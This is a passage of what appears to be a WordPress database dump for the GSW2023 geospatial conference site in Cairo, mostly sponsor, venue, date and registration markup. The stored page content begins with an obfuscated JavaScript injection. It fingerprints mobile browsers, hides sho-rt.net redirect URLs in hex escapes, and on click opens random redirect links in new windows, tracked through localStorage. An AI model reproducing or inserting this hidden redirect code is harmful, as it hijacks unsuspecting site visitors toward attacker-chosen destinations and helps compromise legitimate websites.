_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:09:48','2023-05-24 23:09:48','',3066,'https://gsw2023.com/?p=4561',0,'revision','',0),
(4562,1,'2023-05-24 23:10:21','2023-05-24 23:10:21','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969774377{margin-top: 50px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 